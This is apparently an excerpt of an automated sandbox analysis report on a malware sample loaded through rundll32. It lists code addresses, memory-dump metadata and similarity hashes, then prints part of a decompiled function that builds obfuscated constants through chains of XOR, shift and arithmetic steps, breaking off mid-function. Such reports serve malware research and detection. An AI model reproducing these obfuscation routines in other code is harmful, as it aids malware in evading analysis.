                                                                                                                          0x007a5af0
                                                                                                                          0x007a5af5
                                                                                                                          0x00000000
                                                                                                                          0x007a5a3c
                                                                                                                          0x007a5a3c
                                                                                                                          0x007a5a42
                                                                                                                          0x007a5a9b
                                                                                                                          0x007a5aa2
                                                                                                                          0x007a5aa7
                                                                                                                          0x007a5aa9
                                                                                                                          0x007a5aac
                                                                                                                          0x007a5ab3
                                                                                                                          0x007a5ab8
                                                                                                                          0x00000000
                                                                                                                          0x007a5a44
                                                                                                                          0x007a5a44
                                                                                                                          0x007a5a4a
                                                                                                                          0x00000000
                                                                                                                          0x007a5b2d
                                                                                                                          0x007a5a50
                                                                                                                          0x007a5a56
                                                                                                                          0x00000000
                                                                                                                          0x007a5a5c
                                                                                                                          0x007a5a6b
                                                                                                                          0x007a5a70
                                                                                                                          0x007a5a71
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5a56
                                                                                                                          0x007a5a42
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5b3a
                                                                                                                          0x007a5728
                                                                                                                          0x007a5a20
                                                                                                                          0x007a5a25
                                                                                                                          0x007a5a26
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5734
                                                                                                                          0x007a59ce
                                                                                                                          0x007a59dc
                                                                                                                          0x007a59e3
                                                                                                                          0x007a59ee
                                                                                                                          0x007a59f8
                                                                                                                          0x007a59f9
                                                                                                                          0x007a59fe
                                                                                                                          0x007a5a01
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x00000000
                                                                                                                          0x007a5717
                                                                                                                          0x007a5717
                                                                                                                          0x007a5740
                                                                                                                          0x007a5948
                                                                                                                          0x007a597a
                                                                                                                          0x007a59ad
                                                                                                                          0x007a59b4
                                                                                                                          0x007a59b9
                                                                                                                          0x007a59bc
                                                                                                                          0x007a59be
                                                                                                                          0x007a59c4
                                                                                                                          0x00000000
                                                                                                                          0x007a59c4
                                                                                                                          0x007a5746
                                                                                                                          0x007a574c
                                                                                                                          0x007a584c
                                                                                                                          0x007a5889
                                                                                                                          0x007a5890
                                                                                                                          0x007a5895
                                                                                                                          0x007a589e
                                                                                                                          0x007a58e5
                                                                                                                          0x007a58f4
                                                                                                                          0x007a5918
                                                                                                                          0x007a591c

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$xO4$~wP`$!=$'$zQ5
                                                                                                                          • API String ID: 1514166925-1547002888
                                                                                                                          • Opcode ID: 7a72d04812dd119e2bac831374250006d63a769c9f6c872fda342a2b36d08694
                                                                                                                          • Instruction ID: abf3ceac82ed35a8adf11241fc901800878f6a60856f282fb3f995439422294b
                                                                                                                          • Opcode Fuzzy Hash: 7a72d04812dd119e2bac831374250006d63a769c9f6c872fda342a2b36d08694
                                                                                                                          • Instruction Fuzzy Hash: BF72FE714093819BD3B8CF25C58AB8BBBE1BBC5318F108A1DE1DA96260D7B48949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007A2550() {
                                                                                                                          				signed int _v28;
                                                                                                                          				char _v36;
                                                                                                                          				char _v84;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v140;
                                                                                                                          				intOrPtr _v144;
                                                                                                                          				char _v152;
                                                                                                                          				signed int _v172;
                                                                                                                          				char _v180;
                                                                                                                          				char _v188;
                                                                                                                          				char _v192;
                                                                                                                          				char _v196;
                                                                                                                          				char _v200;
                                                                                                                          				char _v204;
                                                                                                                          				signed int _v208;
                                                                                                                          				signed int _v212;
                                                                                                                          				signed int _v216;
                                                                                                                          				signed int _v220;
                                                                                                                          				signed int _v224;
                                                                                                                          				signed int _v228;
                                                                                                                          				signed int _v232;
                                                                                                                          				signed int _v236;
                                                                                                                          				signed int _v240;
                                                                                                                          				signed int _v244;
                                                                                                                          				signed int _v248;
                                                                                                                          				signed int _v252;
                                                                                                                          				signed int _v256;
                                                                                                                          				signed int _v260;
                                                                                                                          				signed int _v264;
                                                                                                                          				signed int _v268;
                                                                                                                          				signed int _v272;
                                                                                                                          				signed int _v276;
                                                                                                                          				signed int _v280;
                                                                                                                          				signed int _v284;
                                                                                                                          				signed int _v288;
                                                                                                                          				unsigned int _v292;
                                                                                                                          				signed int _v296;
                                                                                                                          				signed int _v300;
                                                                                                                          				signed int _v304;
                                                                                                                          				signed int _v308;
                                                                                                                          				signed int _v312;
                                                                                                                          				signed int _v316;
                                                                                                                          				signed int _v320;
                                                                                                                          				signed int _v324;
                                                                                                                          				signed int _v328;
                                                                                                                          				signed int _v332;
                                                                                                                          				signed int _v336;
                                                                                                                          				signed int _v340;
                                                                                                                          				signed int _v344;
                                                                                                                          				signed int _v348;
                                                                                                                          				signed int _v352;
                                                                                                                          				signed int _v356;
                                                                                                                          				signed int _v360;
                                                                                                                          				signed int _v364;
                                                                                                                          				signed int _v368;
                                                                                                                          				signed int _v372;
                                                                                                                          				signed int _v376;
                                                                                                                          				signed int _v380;
                                                                                                                          				signed int _v384;
                                                                                                                          				signed int _v388;
                                                                                                                          				signed int _v392;
                                                                                                                          				unsigned int _v396;
                                                                                                                          				signed int _v400;
                                                                                                                          				signed int _v404;
                                                                                                                          				signed int _v408;
                                                                                                                          				signed int _v412;
                                                                                                                          				signed int _v416;
                                                                                                                          				signed int _v420;
                                                                                                                          				signed int _v424;
                                                                                                                          				signed int _v428;
                                                                                                                          				signed int _v432;
                                                                                                                          				signed int _v436;
                                                                                                                          				signed int _v440;
                                                                                                                          				signed int _v444;
                                                                                                                          				signed int _v448;
                                                                                                                          				signed int _v452;
                                                                                                                          				signed int _v456;
                                                                                                                          				signed int _v460;
                                                                                                                          				signed int _v464;
                                                                                                                          				signed int _v468;
                                                                                                                          				signed int _v472;
                                                                                                                          				signed int _v476;
                                                                                                                          				signed int _v480;
                                                                                                                          				unsigned int _v484;
                                                                                                                          				unsigned int _v488;
                                                                                                                          				signed int _v492;
                                                                                                                          				signed int _v496;
                                                                                                                          				signed int _v500;
                                                                                                                          				signed int _v504;
                                                                                                                          				signed int _v508;
                                                                                                                          				unsigned int _v512;
                                                                                                                          				signed int _v516;
                                                                                                                          				signed int _v520;
                                                                                                                          				signed int _v524;
                                                                                                                          				signed int _v528;
                                                                                                                          				unsigned int _v532;
                                                                                                                          				signed int _v536;
                                                                                                                          				signed int _v540;
                                                                                                                          				unsigned int _v544;
                                                                                                                          				signed int _v548;
                                                                                                                          				unsigned int _v552;
                                                                                                                          				signed int _v556;
                                                                                                                          				signed int _v560;
                                                                                                                          				signed int _v564;
                                                                                                                          				signed int _v568;
                                                                                                                          				signed int _v572;
                                                                                                                          				unsigned int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				unsigned int _v588;
                                                                                                                          				unsigned int _v592;
                                                                                                                          				signed int _v596;
                                                                                                                          				signed int _v600;
                                                                                                                          				signed int _v604;
                                                                                                                          				signed int _v608;
                                                                                                                          				signed int _v612;
                                                                                                                          				signed int _v616;
                                                                                                                          				signed int _v620;
                                                                                                                          				signed int _v624;
                                                                                                                          				signed int _v628;
                                                                                                                          				signed int _v632;
                                                                                                                          				signed int _v636;
                                                                                                                          				signed int _t1114;
                                                                                                                          				signed int _t1118;
                                                                                                                          				signed int _t1122;
                                                                                                                          				signed int _t1124;
                                                                                                                          				signed int _t1125;
                                                                                                                          				signed int _t1130;
                                                                                                                          				void* _t1134;
                                                                                                                          				signed int _t1141;
                                                                                                                          				signed int _t1190;
                                                                                                                          				signed int _t1191;
                                                                                                                          				signed int _t1193;
                                                                                                                          				signed int _t1194;
                                                                                                                          				signed int _t1195;
                                                                                                                          				signed int _t1196;
                                                                                                                          				signed int _t1197;
                                                                                                                          				signed int _t1198;
                                                                                                                          				signed int _t1199;
                                                                                                                          				signed int _t1200;
                                                                                                                          				signed int _t1201;
                                                                                                                          				signed int _t1202;
                                                                                                                          				signed int _t1203;
                                                                                                                          				signed int _t1204;
                                                                                                                          				signed int _t1205;
                                                                                                                          				signed int _t1206;
                                                                                                                          				signed int _t1207;
                                                                                                                          				signed int _t1208;
                                                                                                                          				signed int _t1209;
                                                                                                                          				signed int _t1210;
                                                                                                                          				signed int _t1211;
                                                                                                                          				signed int _t1212;
                                                                                                                          				signed int _t1213;
                                                                                                                          				signed int _t1214;
                                                                                                                          				signed int _t1215;
                                                                                                                          				signed int _t1313;
                                                                                                                          				signed int _t1314;
                                                                                                                          				signed int _t1317;
                                                                                                                          				signed int _t1343;
                                                                                                                          				void* _t1345;
                                                                                                                          				void* _t1348;
                                                                                                                          				void* _t1349;
                                                                                                                          				void* _t1350;
                                                                                                                          
                                                                                                                          				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
                                                                                                                          				_v372 = 0xaca17;
                                                                                                                          				_v372 = _v372 << 9;
                                                                                                                          				_v372 = _v372 ^ 0xc9927700;
                                                                                                                          				_v372 = _v372 ^ 0xdc065802;
                                                                                                                          				_v560 = 0xa158a0;
                                                                                                                          				_v560 = _v560 + 0xffff5dcd;
                                                                                                                          				_v560 = _v560 ^ 0x175bafac;
                                                                                                                          				_v560 = _v560 + 0xffff9e49;
                                                                                                                          				_v560 = _v560 ^ 0x17fab80a;
                                                                                                                          				_v288 = 0xd4a9a6;
                                                                                                                          				_v288 = _v288 >> 3;
                                                                                                                          				_v288 = _v288 ^ 0x001a9534;
                                                                                                                          				_v504 = 0xe9a5d3;
                                                                                                                          				_v504 = _v504 << 0xa;
                                                                                                                          				_v504 = _v504 | 0xea5982c0;
                                                                                                                          				_t1190 = 0x5f;
                                                                                                                          				_v504 = _v504 / _t1190;
                                                                                                                          				_v504 = _v504 ^ 0x028f5db6;
                                                                                                                          				_t1317 = 0x5d794ec;
                                                                                                                          				_v304 = 0x85b0a3;
                                                                                                                          				_v304 = _v304 | 0x2bca024a;
                                                                                                                          				_v304 = _v304 ^ 0x2bcc012b;
                                                                                                                          				_v556 = 0x1ecc82;
                                                                                                                          				_v556 = _v556 | 0xf08df0d8;
                                                                                                                          				_v556 = _v556 + 0xa531;
                                                                                                                          				_v556 = _v556 ^ 0xfe698427;
                                                                                                                          				_v556 = _v556 ^ 0x0ecdaa65;
                                                                                                                          				_v300 = 0x8f610e;
                                                                                                                          				_v300 = _v300 + 0xfe33;
                                                                                                                          				_v300 = _v300 ^ 0x0094e207;
                                                                                                                          				_v600 = 0x1cab4a;
                                                                                                                          				_t1193 = 0x18;
                                                                                                                          				_v600 = _v600 / _t1193;
                                                                                                                          				_v600 = _v600 + 0xffff3801;
                                                                                                                          				_v600 = _v600 + 0x515c;
                                                                                                                          				_v600 = _v600 ^ 0x0001e7c9;
                                                                                                                          				_v568 = 0xbab742;
                                                                                                                          				_v568 = _v568 + 0xcc5d;
                                                                                                                          				_v568 = _v568 | 0x5c48aa02;
                                                                                                                          				_t1194 = 0x5e;
                                                                                                                          				_v568 = _v568 / _t1194;
                                                                                                                          				_v568 = _v568 ^ 0x00f9db2d;
                                                                                                                          				_v576 = 0x767b63;
                                                                                                                          				_v576 = _v576 >> 3;
                                                                                                                          				_v576 = _v576 + 0xd487;
                                                                                                                          				_v576 = _v576 >> 0x10;
                                                                                                                          				_v576 = _v576 ^ 0x00061026;
                                                                                                                          				_v628 = 0xe4759e;
                                                                                                                          				_v628 = _v628 ^ 0xa26bb658;
                                                                                                                          				_v628 = _v628 * 0x1d;
                                                                                                                          				_v628 = _v628 ^ 0xba259216;
                                                                                                                          				_v628 = _v628 ^ 0xd068fc76;
                                                                                                                          				_v500 = 0xe51d81;
                                                                                                                          				_v500 = _v500 >> 7;
                                                                                                                          				_v500 = _v500 + 0xc085;
                                                                                                                          				_v500 = _v500 * 0x6e;
                                                                                                                          				_v500 = _v500 ^ 0x01113a52;
                                                                                                                          				_v512 = 0xc902c8;
                                                                                                                          				_v512 = _v512 >> 3;
                                                                                                                          				_v512 = _v512 >> 3;
                                                                                                                          				_v512 = _v512 >> 7;
                                                                                                                          				_v512 = _v512 ^ 0x0003c164;
                                                                                                                          				_v532 = 0xda62af;
                                                                                                                          				_v532 = _v532 ^ 0x7c695b99;
                                                                                                                          				_v532 = _v532 >> 0xd;
                                                                                                                          				_v532 = _v532 >> 6;
                                                                                                                          				_v532 = _v532 ^ 0x0009f043;
                                                                                                                          				_v604 = 0x69f539;
                                                                                                                          				_v604 = _v604 << 0xd;
                                                                                                                          				_v604 = _v604 + 0xffffd530;
                                                                                                                          				_v604 = _v604 + 0xffffaf77;
                                                                                                                          				_v604 = _v604 ^ 0x3ead80db;
                                                                                                                          				_v384 = 0xab9f19;
                                                                                                                          				_t1195 = 0xf;
                                                                                                                          				_t1313 = 0x50;
                                                                                                                          				_v384 = _v384 * 0x15;
                                                                                                                          				_v384 = _v384 * 9;
                                                                                                                          				_v384 = _v384 ^ 0x7eb18135;
                                                                                                                          				_v256 = 0xb5a6bd;
                                                                                                                          				_v256 = _v256 | 0x1f71a96d;
                                                                                                                          				_v256 = _v256 ^ 0x1ffe1878;
                                                                                                                          				_v264 = 0xca80f7;
                                                                                                                          				_v264 = _v264 ^ 0x226a3f90;
                                                                                                                          				_v264 = _v264 ^ 0x22af4e12;
                                                                                                                          				_v432 = 0x1b5a57;
                                                                                                                          				_v432 = _v432 << 0xa;
                                                                                                                          				_v432 = _v432 | 0x8c1547fb;
                                                                                                                          				_v432 = _v432 ^ 0xed77fd98;
                                                                                                                          				_v312 = 0xf59d00;
                                                                                                                          				_v312 = _v312 | 0xee7978e1;
                                                                                                                          				_v312 = _v312 ^ 0xeef23383;
                                                                                                                          				_v608 = 0x388a49;
                                                                                                                          				_v608 = _v608 ^ 0x20b0147d;
                                                                                                                          				_v608 = _v608 | 0x120a0452;
                                                                                                                          				_v608 = _v608 / _t1195;
                                                                                                                          				_v608 = _v608 ^ 0x035d442e;
                                                                                                                          				_v632 = 0x8bfb5e;
                                                                                                                          				_v632 = _v632 / _t1313;
                                                                                                                          				_v632 = _v632 | 0x8005d6ab;
                                                                                                                          				_v632 = _v632 + 0xbf6f;
                                                                                                                          				_v632 = _v632 ^ 0x80035879;
                                                                                                                          				_v624 = 0xe5ec6;
                                                                                                                          				_v624 = _v624 << 2;
                                                                                                                          				_v624 = _v624 >> 9;
                                                                                                                          				_v624 = _v624 | 0xadaec6d6;
                                                                                                                          				_v624 = _v624 ^ 0xada90310;
                                                                                                                          				_v392 = 0x144ef;
                                                                                                                          				_t1196 = 0x44;
                                                                                                                          				_v392 = _v392 / _t1196;
                                                                                                                          				_v392 = _v392 + 0xc90b;
                                                                                                                          				_v392 = _v392 ^ 0x0000cf97;
                                                                                                                          				_v236 = 0xf3d10d;
                                                                                                                          				_t1197 = 0x4a;
                                                                                                                          				_v236 = _v236 * 0x7a;
                                                                                                                          				_v236 = _v236 ^ 0x74330487;
                                                                                                                          				_v324 = 0xc3c34b;
                                                                                                                          				_v324 = _v324 * 0x6c;
                                                                                                                          				_v324 = _v324 ^ 0x529af392;
                                                                                                                          				_v520 = 0x2a70ca;
                                                                                                                          				_v520 = _v520 / _t1197;
                                                                                                                          				_v520 = _v520 >> 4;
                                                                                                                          				_v520 = _v520 ^ 0x2a4d5a72;
                                                                                                                          				_v520 = _v520 ^ 0x2a4dbf28;
                                                                                                                          				_v340 = 0xc9c056;
                                                                                                                          				_t1198 = 7;
                                                                                                                          				_v340 = _v340 * 0x23;
                                                                                                                          				_v340 = _v340 | 0xe2238341;
                                                                                                                          				_v340 = _v340 ^ 0xfbb710ef;
                                                                                                                          				_v248 = 0x9a54c0;
                                                                                                                          				_v248 = _v248 | 0xe08ac880;
                                                                                                                          				_v248 = _v248 ^ 0xe09bcbd4;
                                                                                                                          				_v348 = 0xe0760;
                                                                                                                          				_v348 = _v348 << 7;
                                                                                                                          				_v348 = _v348 + 0x49a3;
                                                                                                                          				_v348 = _v348 ^ 0x070edb7d;
                                                                                                                          				_v356 = 0xf94015;
                                                                                                                          				_v356 = _v356 * 0x4d;
                                                                                                                          				_v356 = _v356 << 1;
                                                                                                                          				_v356 = _v356 ^ 0x95f7b4be;
                                                                                                                          				_v320 = 0x1268a5;
                                                                                                                          				_v320 = _v320 / _t1198;
                                                                                                                          				_v320 = _v320 ^ 0x00080ceb;
                                                                                                                          				_v396 = 0xbdcf3e;
                                                                                                                          				_t1199 = 0x4b;
                                                                                                                          				_v396 = _v396 * 0x4d;
                                                                                                                          				_v396 = _v396 >> 2;
                                                                                                                          				_v396 = _v396 ^ 0x0e48dd39;
                                                                                                                          				_v596 = 0x7780dd;
                                                                                                                          				_v596 = _v596 << 0xd;
                                                                                                                          				_v596 = _v596 | 0xdff7e7fd;
                                                                                                                          				_v596 = _v596 ^ 0xfff000ad;
                                                                                                                          				_v492 = 0x5c66b3;
                                                                                                                          				_v492 = _v492 * 0x2a;
                                                                                                                          				_v492 = _v492 ^ 0xe8f32aee;
                                                                                                                          				_v492 = _v492 >> 0xd;
                                                                                                                          				_v492 = _v492 ^ 0x000eb956;
                                                                                                                          				_v316 = 0x3e4fae;
                                                                                                                          				_v316 = _v316 >> 3;
                                                                                                                          				_v316 = _v316 ^ 0x00075837;
                                                                                                                          				_v344 = 0xe0dcd8;
                                                                                                                          				_v344 = _v344 >> 1;
                                                                                                                          				_v344 = _v344 + 0xffff4400;
                                                                                                                          				_v344 = _v344 ^ 0x0066aca9;
                                                                                                                          				_v460 = 0xbe16e8;
                                                                                                                          				_v460 = _v460 * 0x45;
                                                                                                                          				_v460 = _v460 ^ 0x56f71a5b;
                                                                                                                          				_v460 = _v460 / _t1199;
                                                                                                                          				_v460 = _v460 ^ 0x0158823c;
                                                                                                                          				_v588 = 0x54b44f;
                                                                                                                          				_v588 = _v588 ^ 0xc5cf08f3;
                                                                                                                          				_v588 = _v588 ^ 0x4b1db793;
                                                                                                                          				_v588 = _v588 >> 0xb;
                                                                                                                          				_v588 = _v588 ^ 0x00183ace;
                                                                                                                          				_v524 = 0xbfc9bb;
                                                                                                                          				_t1200 = 0x67;
                                                                                                                          				_v524 = _v524 * 0x4d;
                                                                                                                          				_v524 = _v524 * 0x71;
                                                                                                                          				_v524 = _v524 << 1;
                                                                                                                          				_v524 = _v524 ^ 0xed1ab829;
                                                                                                                          				_v376 = 0x55c29;
                                                                                                                          				_v376 = _v376 << 0xc;
                                                                                                                          				_v376 = _v376 ^ 0xdae248eb;
                                                                                                                          				_v376 = _v376 ^ 0x8f2c7d73;
                                                                                                                          				_v424 = 0x330008;
                                                                                                                          				_v424 = _v424 << 0xb;
                                                                                                                          				_v424 = _v424 / _t1200;
                                                                                                                          				_v424 = _v424 ^ 0x017d7462;
                                                                                                                          				_v580 = 0xb4c97;
                                                                                                                          				_v580 = _v580 | 0x569d8b1e;
                                                                                                                          				_v580 = _v580 >> 1;
                                                                                                                          				_t1201 = 3;
                                                                                                                          				_v580 = _v580 / _t1201;
                                                                                                                          				_v580 = _v580 ^ 0x0e68230a;
                                                                                                                          				_v328 = 0x695dff;
                                                                                                                          				_v328 = _v328 ^ 0x424f14af;
                                                                                                                          				_v328 = _v328 ^ 0x4224025c;
                                                                                                                          				_v284 = 0xae8351;
                                                                                                                          				_t1202 = 0x57;
                                                                                                                          				_v284 = _v284 * 0x60;
                                                                                                                          				_v284 = _v284 ^ 0x417e5081;
                                                                                                                          				_v444 = 0x78eba1;
                                                                                                                          				_v444 = _v444 * 0x5f;
                                                                                                                          				_v444 = _v444 ^ 0x00193e0b;
                                                                                                                          				_v444 = _v444 ^ 0x2cc98685;
                                                                                                                          				_v592 = 0x15a443;
                                                                                                                          				_v592 = _v592 / _t1202;
                                                                                                                          				_v592 = _v592 + 0xffff9c6f;
                                                                                                                          				_v592 = _v592 >> 5;
                                                                                                                          				_v592 = _v592 ^ 0x07f20231;
                                                                                                                          				_v216 = 0x5d0672;
                                                                                                                          				_v216 = _v216 << 3;
                                                                                                                          				_v216 = _v216 ^ 0x02ee7d7e;
                                                                                                                          				_v548 = 0xb50861;
                                                                                                                          				_v548 = _v548 >> 0xc;
                                                                                                                          				_v548 = _v548 << 0xf;
                                                                                                                          				_v548 = _v548 + 0xffffef54;
                                                                                                                          				_v548 = _v548 ^ 0x05ac6923;
                                                                                                                          				_v452 = 0x2163b6;
                                                                                                                          				_v452 = _v452 | 0xbb60e7c3;
                                                                                                                          				_v452 = _v452 ^ 0x0d3b8c6d;
                                                                                                                          				_v452 = _v452 ^ 0xb65710e5;
                                                                                                                          				_v636 = 0x61f3a7;
                                                                                                                          				_v636 = _v636 + 0xffff300f;
                                                                                                                          				_v636 = _v636 << 1;
                                                                                                                          				_v636 = _v636 * 0x27;
                                                                                                                          				_v636 = _v636 ^ 0x1d9bc7e7;
                                                                                                                          				_v224 = 0x725254;
                                                                                                                          				_v224 = _v224 + 0xfffffac1;
                                                                                                                          				_v224 = _v224 ^ 0x007e9bc6;
                                                                                                                          				_v228 = 0xd6200c;
                                                                                                                          				_v228 = _v228 ^ 0x5ef32346;
                                                                                                                          				_v228 = _v228 ^ 0x5e2a0e2d;
                                                                                                                          				_v540 = 0xc12668;
                                                                                                                          				_v540 = _v540 << 8;
                                                                                                                          				_v540 = _v540 * 0x51;
                                                                                                                          				_v540 = _v540 + 0xffff6981;
                                                                                                                          				_v540 = _v540 ^ 0x1d2c502d;
                                                                                                                          				_v496 = 0x68726f;
                                                                                                                          				_v496 = _v496 + 0xb8c4;
                                                                                                                          				_v496 = _v496 + 0xffff3269;
                                                                                                                          				_v496 = _v496 << 1;
                                                                                                                          				_v496 = _v496 ^ 0x00d37668;
                                                                                                                          				_v296 = 0x65f16b;
                                                                                                                          				_v296 = _v296 ^ 0xac840f83;
                                                                                                                          				_v296 = _v296 ^ 0xace8f4ad;
                                                                                                                          				_v336 = 0xf34185;
                                                                                                                          				_v336 = _v336 + 0xffff7084;
                                                                                                                          				_v336 = _v336 ^ 0x22f89925;
                                                                                                                          				_v336 = _v336 ^ 0x2207d32f;
                                                                                                                          				_v400 = 0x9220b0;
                                                                                                                          				_v400 = _v400 | 0xa2c46701;
                                                                                                                          				_v400 = _v400 + 0x1a14;
                                                                                                                          				_v400 = _v400 ^ 0xa2d5ce26;
                                                                                                                          				_v368 = 0x18190f;
                                                                                                                          				_v368 = _v368 * 0x6c;
                                                                                                                          				_t1203 = 0x47;
                                                                                                                          				_v368 = _v368 * 0x49;
                                                                                                                          				_v368 = _v368 ^ 0xe62bbbec;
                                                                                                                          				_v276 = 0x664929;
                                                                                                                          				_v276 = _v276 + 0xffffab3c;
                                                                                                                          				_v276 = _v276 ^ 0x0066f8be;
                                                                                                                          				_v420 = 0x55fac4;
                                                                                                                          				_v420 = _v420 / _t1203;
                                                                                                                          				_v420 = _v420 | 0x23698c02;
                                                                                                                          				_v420 = _v420 ^ 0x23676b12;
                                                                                                                          				_v428 = 0x2d8f3d;
                                                                                                                          				_v428 = _v428 ^ 0xcbbc8554;
                                                                                                                          				_v428 = _v428 + 0xffff5f5b;
                                                                                                                          				_v428 = _v428 ^ 0xcb969d3b;
                                                                                                                          				_v408 = 0x7d0ed3;
                                                                                                                          				_t1204 = 0x33;
                                                                                                                          				_v408 = _v408 / _t1204;
                                                                                                                          				_v408 = _v408 ^ 0x03ccba73;
                                                                                                                          				_v408 = _v408 ^ 0x03c41a74;
                                                                                                                          				_v212 = 0xf1bcf;
                                                                                                                          				_v212 = _v212 | 0xafbe7d4b;
                                                                                                                          				_v212 = _v212 ^ 0xafbe5483;
                                                                                                                          				_v476 = 0x76a0ac;
                                                                                                                          				_v476 = _v476 << 0xa;
                                                                                                                          				_v476 = _v476 << 2;
                                                                                                                          				_v476 = _v476 >> 6;
                                                                                                                          				_v476 = _v476 ^ 0x01aadd1c;
                                                                                                                          				_v252 = 0xacd74c;
                                                                                                                          				_v252 = _v252 + 0xffffc13c;
                                                                                                                          				_v252 = _v252 ^ 0x00a0cd5e;
                                                                                                                          				_v232 = 0x48ff42;
                                                                                                                          				_t1205 = 0x1a;
                                                                                                                          				_v232 = _v232 / _t1205;
                                                                                                                          				_v232 = _v232 ^ 0x0005b06f;
                                                                                                                          				_v620 = 0x68b0f8;
                                                                                                                          				_v620 = _v620 | 0x9e72bceb;
                                                                                                                          				_v620 = _v620 ^ 0x53ebce50;
                                                                                                                          				_v620 = _v620 + 0x60e9;
                                                                                                                          				_v620 = _v620 ^ 0xcd9386df;
                                                                                                                          				_v572 = 0xa5dd6d;
                                                                                                                          				_v572 = _v572 << 0xb;
                                                                                                                          				_t1206 = 0x6b;
                                                                                                                          				_v572 = _v572 / _t1206;
                                                                                                                          				_v572 = _v572 + 0xe547;
                                                                                                                          				_v572 = _v572 ^ 0x00701f50;
                                                                                                                          				_v516 = 0x27ee1e;
                                                                                                                          				_v516 = _v516 + 0x5114;
                                                                                                                          				_v516 = _v516 ^ 0xd07a9b41;
                                                                                                                          				_v516 = _v516 ^ 0x4a8a2a52;
                                                                                                                          				_v516 = _v516 ^ 0x9ad4de84;
                                                                                                                          				_v484 = 0xc04b63;
                                                                                                                          				_v484 = _v484 >> 3;
                                                                                                                          				_v484 = _v484 >> 4;
                                                                                                                          				_v484 = _v484 + 0xffff6956;
                                                                                                                          				_v484 = _v484 ^ 0x000f5fa9;
                                                                                                                          				_v416 = 0x10eb88;
                                                                                                                          				_v416 = _v416 | 0xd8fa91ef;
                                                                                                                          				_v416 = _v416 ^ 0xf957ef44;
                                                                                                                          				_v416 = _v416 ^ 0x21a34ff6;
                                                                                                                          				_v412 = 0xf4f2f5;
                                                                                                                          				_v412 = _v412 + 0xffff8ffc;
                                                                                                                          				_v412 = _v412 + 0xffff7090;
                                                                                                                          				_v412 = _v412 ^ 0x00f029cf;
                                                                                                                          				_v268 = 0xc7943e;
                                                                                                                          				_v268 = _v268 << 0x10;
                                                                                                                          				_v268 = _v268 ^ 0x94371f3e;
                                                                                                                          				_v544 = 0x509d95;
                                                                                                                          				_v544 = _v544 >> 0xa;
                                                                                                                          				_v544 = _v544 >> 0xf;
                                                                                                                          				_v544 = _v544 >> 0xa;
                                                                                                                          				_v544 = _v544 ^ 0x0008d406;
                                                                                                                          				_v552 = 0x34f7be;
                                                                                                                          				_v552 = _v552 / _t1190;
                                                                                                                          				_v552 = _v552 >> 0x10;
                                                                                                                          				_v552 = _v552 >> 5;
                                                                                                                          				_v552 = _v552 ^ 0x0008c95b;
                                                                                                                          				_v404 = 0x94eb91;
                                                                                                                          				_v404 = _v404 ^ 0x41984e3b;
                                                                                                                          				_v404 = _v404 << 3;
                                                                                                                          				_v404 = _v404 ^ 0x08661611;
                                                                                                                          				_v220 = 0x500384;
                                                                                                                          				_v220 = _v220 ^ 0xbbdae5ed;
                                                                                                                          				_v220 = _v220 ^ 0xbb8779fc;
                                                                                                                          				_v448 = 0x89f4a;
                                                                                                                          				_t1207 = 0x66;
                                                                                                                          				_v448 = _v448 * 0x78;
                                                                                                                          				_v448 = _v448 / _t1313;
                                                                                                                          				_v448 = _v448 ^ 0x000df59a;
                                                                                                                          				_v292 = 0x19f8d0;
                                                                                                                          				_v292 = _v292 >> 0xf;
                                                                                                                          				_v292 = _v292 ^ 0x0007f69a;
                                                                                                                          				_v616 = 0x49d3c1;
                                                                                                                          				_v616 = _v616 | 0x94d46b10;
                                                                                                                          				_v616 = _v616 >> 0xe;
                                                                                                                          				_v616 = _v616 | 0x382c489e;
                                                                                                                          				_v616 = _v616 ^ 0x382cb35c;
                                                                                                                          				_v440 = 0x57429d;
                                                                                                                          				_v440 = _v440 << 0x10;
                                                                                                                          				_v440 = _v440 + 0x8d95;
                                                                                                                          				_v440 = _v440 ^ 0x429b4669;
                                                                                                                          				_v612 = 0x469ad0;
                                                                                                                          				_v612 = _v612 ^ 0xa9c1a766;
                                                                                                                          				_v612 = _v612 | 0x8fd1d886;
                                                                                                                          				_v612 = _v612 << 1;
                                                                                                                          				_v612 = _v612 ^ 0x5faedd57;
                                                                                                                          				_v244 = 0xe276bf;
                                                                                                                          				_v244 = _v244 * 0x1a;
                                                                                                                          				_v244 = _v244 ^ 0x170afa50;
                                                                                                                          				_v352 = 0x60bcf5;
                                                                                                                          				_v352 = _v352 + 0xf9c7;
                                                                                                                          				_v352 = _v352 ^ 0xebf612c1;
                                                                                                                          				_v352 = _v352 ^ 0xeb9276cf;
                                                                                                                          				_v488 = 0xa1517b;
                                                                                                                          				_v488 = _v488 / _t1207;
                                                                                                                          				_t1208 = 0x68;
                                                                                                                          				_v488 = _v488 * 0x65;
                                                                                                                          				_v488 = _v488 >> 0xc;
                                                                                                                          				_v488 = _v488 ^ 0x00034996;
                                                                                                                          				_v388 = 0x73cbfd;
                                                                                                                          				_v388 = _v388 << 5;
                                                                                                                          				_v388 = _v388 / _t1208;
